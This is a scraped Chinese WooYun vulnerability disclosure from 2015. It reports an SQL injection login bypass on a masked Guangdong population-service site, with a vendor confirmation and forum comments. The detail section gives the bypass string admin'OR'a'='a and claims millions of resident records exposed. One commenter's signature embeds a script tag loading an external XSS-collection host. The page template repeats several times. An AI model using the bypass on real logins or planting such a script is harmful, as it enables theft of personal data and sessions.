广东某服务平台漏洞导致千万人口信泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091398

漏洞标题：广东某服务平台漏洞导致千万人口信泄露

漏洞作者：咸鱼翻身

提交时间：2015-01-12 17:34

修复时间：2015-02-26 17:36

公开时间：2015-02-26 17:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-12：细节已通知厂商并且等待厂商处理中
2015-01-13：厂商已经确认，细节仅向厂商公开
2015-01-23：细节向核心白帽子及相关领域专家公开
2015-02-02：细节向普通白帽子公开
2015-02-12：细节向实习白帽子公开
2015-02-26：细节向公众公开

简要描述：

hello word

详细说明：

mask 区域

1.http://**.**.**/xgrptwo/index.jsp

地址
admin'OR'a'='a 密码

任意选择，通杀

漏洞证明：

现住人口400多万，离去人口600多万。

仅仅查询了一个系统，800多万。其他的不过多深入

修复方案：

加强过滤

版权声明：转载请注明来源咸鱼翻身@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-01-13 10:56

厂商回复：

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据：高
攻击成本：低
造成影响：高
综合评级为：高，rank：15
正在联系相关网站管理单位处置。

漏洞评价：

2015-01-12 17:36 | 碎片 ( 路人 | Rank:23 漏洞数:9 | <script src=http://www.xss8.net/?c=MjMf4...)

CCAV这里看
2015-01-12 17:39 | 猪猪侠 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了，还要自由干吗？)

这个标题有点厉害，吓到我了
2015-01-12 17:43 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫，是《红楼梦》原创的词汇，但后来演变...)

东莞？
2015-01-12 17:58 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨，淡看江湖路...)

关注
2015-01-12 18:20 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

@YY-2012 机智啊
2015-01-12 18:21 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

@猪猪侠大佬，收小弟吗
2015-01-12 18:53 | 红客十年 ( 普通白帽子 | Rank:334 漏洞数:63 | 去年离职富士康，回到家中上蓝翔，蓝翔毕业...)

有大牛出没留个影
2015-01-12 19:39 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了，跪着也要...)

有本事来查我啊！！楼下保持队形
2015-01-12 22:12 | zeracker ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

看着很牛逼啊... 大数据分析下可以做很多事情啊
2015-01-13 04:28 | Let a person cry. ( 路人 | Rank:23 漏洞数:9 | xxoo)

这个绝对牛逼
2015-02-26 19:23 | black hook ( 路人 | Rank:28 漏洞数:8 | 新人、)

CCAV这里看
2015-02-26 21:14 | idcspy ( 路人 | 还没有发布任何漏洞 | idcspy)

自从扫黄后,新莞女性大幅减少.
2015-04-27 17:54 | xiaogui ( 实习白帽子 | Rank:88 漏洞数:24 | 围观大牛来了~~~)

自从有了这个再也不需要百度google找电话了

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091398

漏洞标题：广东某服务平台漏洞导致千万人口信泄露

相关厂商：广东省信息安全测评中心

漏洞作者：咸鱼翻身

提交时间：2015-01-12 17:34

修复时间：2015-02-26 17:36

公开时间：2015-02-26 17:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源咸鱼翻身@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-091398

漏洞标题：广东某服务平台漏洞导致千万人口信泄露

相关厂商：广东省信息安全测评中心

漏洞作者： 咸鱼翻身

提交时间：2015-01-12 17:34

修复时间：2015-02-26 17:36

公开时间：2015-02-26 17:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-091398"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 咸鱼翻身@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：咸鱼翻身

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源咸鱼翻身@乌云